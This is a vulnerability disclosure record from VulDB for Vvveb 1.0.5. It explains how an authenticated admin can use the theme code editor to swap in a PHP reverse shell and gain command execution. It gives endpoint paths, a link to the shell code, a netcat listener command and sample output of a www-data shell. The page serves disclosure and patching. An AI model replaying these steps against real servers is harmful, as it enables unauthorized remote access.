| Title | Vvveb 1.0.5 Privilege Escalation to RCE |
|---|
| Description | Description
Admins have access to modify the code of plugins and run it without any validation in place to prevent malicious code execution. An authenticated admin can modify plugins through this endpoint: [/vadmin123/index.php?module=editor/code&type=themes].
Through this endpoint, you can modify code of a PHP file (theme.php) to gain shell access on the webserver.
Reproduce
To reproduce RCE, open the following endpoint:
/vadmin123/index.php?module=editor/code&type=themes
Find and edit theme.php, replace its code with the following shell:
https://gist.github.com/0xHamy/f16fb399f8dd3a973acadc18fa07b1cb
Remember to replace the IP and port with the IP and port of your listener, you can use a listener such as netcat.
Save the PHP file and run it by opening the following page:
/vadmin123/index.php?module=editor/editor&url=/&template=index.html
Watch your netcat listener and you will get a reverse shell connection:
$ nc -lnvp 6060
Listening on x.x.x.x 6060
Connection received on 127.0.0.1 33862
Linux hx0 6.8.0-51-generic #52-Ubuntu SMP PREEMPT_DYNAMIC Thu Dec 5 13:09:44 UTC 2024 x86_64 Linux
sh: w: not found
uid=82(www-data) gid=82(www-data) groups=82(www-data),82(www-data)
/bin/sh: can't access tty; job control turned off
/ $
|
|---|
| Source | ⚠️ https://hkohi.ca/vulnerability/8 |
|---|
| User | 0xHamy (UID 88518) |
|---|
| Submission | 07/29/2025 20:19 (9 months ago) |
|---|
| Moderation | 08/04/2025 08:27 (6 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 318644 [givanz Vvveb 1.0.5 Code Editor code.php save code injection] |
|---|
| Points | 19 |
|---|